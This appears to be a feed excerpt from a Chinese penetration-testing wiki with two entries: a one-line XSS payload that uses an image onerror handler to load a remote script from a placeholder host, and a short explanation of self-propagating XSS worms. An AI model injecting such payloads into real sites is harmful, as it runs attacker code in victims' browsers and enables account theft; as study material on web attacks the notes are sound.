http://css3.sinriv.com/ 2026-06-03T06:37:47+0800 http://css3.sinriv.com/ http://css3.sinriv.com/lib/tpl/dokuwiki/images/favicon.ico text/html 2019-08-09T10:12:31+0800 Anonymous (anonymous@undisclosed.example.com) http://css3.sinriv.com/%E6%B8%97%E9%80%8F:xss:%E5%8A%A0%E8%BD%BD?rev=1565316751 xss加载远程js文件 <img src=x onerror=document.body.appendChild(document.createElement('script')).src='//xxx.xxx/a.js'> text/html 2019-08-09T11:56:39+0800 Anonymous (anonymous@undisclosed.example.com) http://css3.sinriv.com/%E6%B8%97%E9%80%8F:xss:%E8%A0%95%E8%99%AB?rev=1565322999 XSS蠕虫 XSS蠕虫是指一种具有自我传播能力的XSS攻击，杀伤力很大。引发XSS蠕虫的条件比较高，需要在用户之间发生交互行为的页面，这样才能形成有效的传播。一般要同时结合反射型XSS和存储型XSS。